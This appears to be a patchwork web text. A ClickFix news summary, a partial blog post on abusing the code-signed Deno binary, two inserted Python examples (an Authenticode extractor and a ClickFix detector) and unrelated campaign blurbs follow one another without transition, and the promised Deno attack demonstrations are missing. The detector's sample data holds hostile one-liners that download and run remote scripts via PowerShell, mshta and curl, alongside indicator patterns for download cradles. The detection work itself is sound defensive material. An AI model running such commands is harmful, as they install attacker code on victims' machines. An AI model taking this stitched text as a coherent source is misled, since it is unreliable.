A new campaign employing ClickFix attacks has been spotted targeting both Windows and Linux systems using instructions that make infections on either operating system possible.
ClickFix is a social engineering tactic in which a fake verification check or a bogus application error instructs website visitors to paste and run a command themselves, so malware gets installed without the attacker needing a browser exploit.
These attacks have traditionally targeted Windows, telling the victim to open the Run dialog (Win+R) and execute a PowerShell one-liner, which has led to info-stealer infections and even ransomware.
However, a 2024 campaign using bogus Google Meet errors also targeted macOS users.
ClickFix targeting Linux users
A more recent campaign spotted by Hunt.io researchers last week is among the first to adapt this social engineering technique for Linux systems.
The attack, which is attributed to the Pakistan-linked threat group APT36 (aka "Transparent Tribe"), utilizes a website that impersonates India's Ministry of Defence with a link to an allegedly official press release.
I've been following the development of Deno for some time. It kind of pushes all my buttons: a Rust-based Node alternative with an active web developer community?? Yes please.
As a developer, I've been looking for excuses to use Deno because, frankly, it's so much fun. It makes JavaScript/TypeScript enjoyable again by shipping sane defaults and making delightful choices about dependency management.
Deno also has some truly incredible features that go beyond the web development ecosystem. I want to focus on these features. I've wanted to explore Deno from an offensive security perspective for some time, but a new development in version 2.3 made this imperative: deno.exe—the standalone binary that constitutes the entire tool—is now code-signed on Windows.
Great news for Deno! But because of what Deno can do, it's also good news for those who would do nefarious things with it.
Code signing (Authenticode, on Windows) proves two things: that the binary has not been modified since it was signed, and that whoever signed it held the private key for a certificate chaining to a CA in the Windows trust store. That is stronger than a bare hash checksum, which only proves the file matches a value you were handed, but it is a statement about origin and integrity, not about what the program does.
It also means (for now) that Defender SmartScreen gives deno.exe a pass: the "unrecognized app" warning for downloaded executables is reputation-based, and reputation accrues to the signing certificate as well as to the file, so an established signed publisher's binary sails through. That says nothing about Defender's behavioural detections, which look at what the process does rather than who signed it.
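Because the signature is just a PKCS#7 blob appended to the PE, the first thing a responder usually wants is to pull it out and look at who signed it. The following is an added example written for this page (not Deno's code, and not a signature verifier): it parses the PE headers down to the security data directory and returns the WIN_CERTIFICATE entries. The minimal PE32+ image it builds for a self-contained run is constructed test data, and names such as authenticode_info, build_sample_pe and extract_signature are this example's own.

```python
import struct
from typing import Optional

IMAGE_DIRECTORY_ENTRY_SECURITY = 4         # data-directory slot holding the certificate table
WIN_CERT_REVISION_2_0 = 0x0200
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002    # Authenticode: DER-encoded PKCS#7 SignedData


def authenticode_info(pe: bytes) -> dict:
    """Walk the PE headers to the certificate table and return its WIN_CERTIFICATE entries.

    An entry here means a signature blob is attached, nothing more. Verifying it (rehashing the
    image with the checksum field, this directory entry and the table itself excluded, then
    checking the chain and timestamp) is the separate step tools like signtool perform.
    """
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    opt = coff + 20                                    # IMAGE_FILE_HEADER is 20 bytes
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:                                 # PE32: data directories start at +96
        dirs_off = 96
    elif magic == 0x20B:                               # PE32+: data directories start at +112
        dirs_off = 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    num_dirs = struct.unpack_from("<I", pe, opt + dirs_off - 4)[0]   # NumberOfRvaAndSizes
    info = {"pe_format": "PE32+" if magic == 0x20B else "PE32", "signed": False, "entries": []}
    if num_dirs <= IMAGE_DIRECTORY_ENTRY_SECURITY:
        return info
    # Quirk: for the security directory the first field is a raw file offset, not an RVA.
    table_off, table_size = struct.unpack_from(
        "<II", pe, opt + dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    if table_off == 0 or table_size == 0:
        return info
    if table_off + table_size > len(pe):
        raise ValueError("certificate table extends past end of file")
    pos, end = table_off, table_off + table_size
    while pos + 8 <= end:
        length, revision, cert_type = struct.unpack_from("<IHH", pe, pos)
        if length < 8 or pos + length > end:
            raise ValueError("malformed WIN_CERTIFICATE entry")
        info["entries"].append({
            "revision": revision,
            "type": cert_type,
            "is_authenticode": cert_type == WIN_CERT_TYPE_PKCS_SIGNED_DATA,
            "pkcs7": pe[pos + 8:pos + length],         # the DER SignedData, header stripped
        })
        pos += (length + 7) & ~7                       # entries are padded to 8-byte boundaries
    info["signed"] = any(e["is_authenticode"] for e in info["entries"])
    return info


def extract_signature(pe_path: str, out_path: str) -> int:
    """Write the first Authenticode blob from pe_path to out_path; returns bytes written (0 if none)."""
    with open(pe_path, "rb") as f:
        info = authenticode_info(f.read())
    blobs = [e["pkcs7"] for e in info["entries"] if e["is_authenticode"]]
    if not blobs:
        return 0
    with open(out_path, "wb") as f:
        f.write(blobs[0])
    return len(blobs[0])


def build_sample_pe(pkcs7: Optional[bytes]) -> bytes:
    """Constructed test data: a minimal, non-runnable PE32+ image with zero sections and,
    optionally, a certificate table carrying the given bytes as its PKCS#7 payload."""
    opt_size = 112 + 16 * 8
    headers_size = 64 + 4 + 20 + opt_size              # where the certificate table will land
    table = b""
    if pkcs7 is not None:
        table = struct.pack("<IHH", 8 + len(pkcs7), WIN_CERT_REVISION_2_0,
                            WIN_CERT_TYPE_PKCS_SIGNED_DATA) + pkcs7
        table += b"\0" * (-len(table) % 8)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)   # e_lfanew at 0x3C -> right after DOS header
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, opt_size, 0x22)
    opt = struct.pack("<H", 0x20B) + b"\0" * 106 + struct.pack("<I", 16)
    dirs = [(0, 0)] * 16
    if pkcs7 is not None:
        dirs[IMAGE_DIRECTORY_ENTRY_SECURITY] = (headers_size, len(table))
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    return dos + b"PE\0\0" + coff + opt + table


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe(b"\x30\x80placeholder")
    result = authenticode_info(data)
    print(result["pe_format"], "signed" if result["signed"] else "unsigned", len(result["entries"]), "entries")
```

Run it against a real deno.exe (`python extract.py deno.exe`) and, after `extract_signature`, inspect the chain with `openssl pkcs7 -inform DER -in deno.p7b -print_certs -noout`: that shows the publisher and CA, which is exactly the information SmartScreen's reputation is keyed on, and exactly what a hash alone cannot tell you.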
So what can Deno do for the red team and the ne'er-do-wells? I've put together a small sampling of demonstrations of Deno's capabilities.
I'm focusing somewhat on the "ClickFix" attack vector, since it is so prevalent at the time of writing, and apparently so effective. So with each of these, I want you to imagine some version of a user opening Win+R and pasting a short command in.
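To make the Win+R scenario concrete from the blue-team side, here is an added detection example (not from the original post, and not Deno-specific) for the pattern described in the opening ClickFix summary and in the paragraph above: a command pasted into the Run dialog is spawned as a child of explorer.exe, and the pasted text itself survives in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, where each value holds the command with a trailing "\1" and MRUList gives the recency order. The process-creation records, the RunMRU values and the interpreter list are constructed sample data; the indicator regexes, the threshold and names such as detect_clickfix and runmru_history are this example's own choices.

```python
import re

# Process images a pasted ClickFix one-liner typically lands in. deno.exe is included because
# this page discusses it as a signed script host. This list is an assumption; extend it locally.
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe",
    "curl.exe", "certutil.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe", "deno.exe",
}

# Command-line traits of a pasted payload. Each matching name counts one point toward the threshold.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|curl|wget)\b"
        r"|certutil\s+-urlcache", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "bypass_policy": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "mshta": re.compile(r"\bmshta(?:\.exe)?\b", re.I),
}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_indicators(cmdline: str) -> list:
    """Sorted names of every indicator that fires on the command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))


def detect_clickfix(events: list, threshold: int = 2) -> list:
    """Flag process-creation events shaped like a Run-dialog paste: explorer.exe spawning a
    script host whose command line carries at least `threshold` indicators. A single weak hit
    (e.g. an admin running a signed script with -ExecutionPolicy Bypass) stays below the bar."""
    hits = []
    for ev in events:
        if basename(ev["ParentImage"]) != "explorer.exe" or basename(ev["Image"]) not in INTERPRETERS:
            continue
        found = match_indicators(ev["CommandLine"])
        if len(found) >= threshold:
            hits.append({"Image": ev["Image"], "CommandLine": ev["CommandLine"], "indicators": found})
    return hits


def runmru_history(values: dict) -> list:
    """Run-dialog history, most recent first, from the RunMRU value set (command strings end in '\\1')."""
    history = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is not None:
            history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history


def suspicious_run_history(values: dict, threshold: int = 2) -> list:
    """(command, indicators) pairs from RunMRU that meet the threshold; useful on a disk image
    where the process telemetry is gone but the registry hive is not."""
    out = []
    for cmd in runmru_history(values):
        found = match_indicators(cmd)
        if len(found) >= threshold:
            out.append((cmd, found))
    return out


# Constructed sample telemetry in Sysmon Event ID 1 field names; addresses are documentation ranges.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://198.51.100.7/v.txt | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://203.0.113.5/fix.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad"},
    {"ParentImage": r"C:\Users\a\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -Command Get-ChildItem"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c curl -s https://example.invalid/x.ps1 -o %TEMP%\x.ps1 & powershell -ep bypass -f %TEMP%\x.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
]

# Constructed RunMRU values: MRUList "cab" means value c is the most recent paste.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": 'powershell -w hidden -c "iwr http://198.51.100.7/v.txt | iex"\\1',
}

if __name__ == "__main__":
    for hit in detect_clickfix(SAMPLE_EVENTS):
        print("process:", hit["indicators"], hit["CommandLine"])
    for cmd, found in suspicious_run_history(SAMPLE_RUNMRU):
        print("runmru: ", found, cmd)
```

The parent-process condition is what keeps this from firing on every PowerShell launch: a script run from a terminal, a scheduler or an IDE has a different parent, while text typed into Win+R is always executed by explorer.exe. On Linux hosts the equivalent artifact is the shell history of the user who pasted the command, and the same indicator approach (curl or wget piped into a shell, a remote URL, a hidden or backgrounded process) carries over.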
Over 100 auto dealerships were compromised via a supply chain attack on a shared video service used by dealerships. While it was active, the attack presented dealership site visitors with a ClickFix page that led to SectopRAT malware.
Starting in December 2024, leading up to some of the busiest travel days, Microsoft Threat Intelligence identified a phishing campaign that impersonates the online travel agency Booking.com and targets organizations in the hospitality industry. The campaign uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware families in order to conduct financial fraud and theft. […]
Discover how the ClickFix social engineering attack exploits human psychology to bypass security. Learn how hackers use this tactic and how to protect against it.
FortiGuard Labs reveals a modified Havoc deployed by a ClickFix phishing campaign. The threat actor hides each stage behind SharePoint and also uses it as a C2.
Guardio Labs tracked and analyzed a large-scale fake captcha campaign distributing a disastrous Lumma info-stealer malware that circumvents general security measures like Safe Browsing. Entirely reliant on a single ad network for propagation, this campaign showcases the core mechanisms of malvertising — delivering over 1 million daily “ad impressions” and causing thousands of daily victims to lose their accounts and money through a network of 3,000+ content sites funneling traffic. Our research dissects this campaign and provides insights into the malvertising industry’s infrastructure, tactics, and key players.
Through a detailed analysis of redirect chains, obfuscated scripts, and Traffic Distribution Systems (TDS) — in collaboration with our friends at Infoblox — we traced the campaign’s origins to Monetag, a part of PropellerAds’ network previously tracked by Infoblox under the name “Vane Viper.” Further investigation reveals how threat actors leveraged services like BeMob ad-tracking to cloak their malicious intent, showcasing the fragmented accountability in the ad ecosystem. This lack of oversight leaves internet users vulnerable and enables malvertising campaigns to flourish at scale.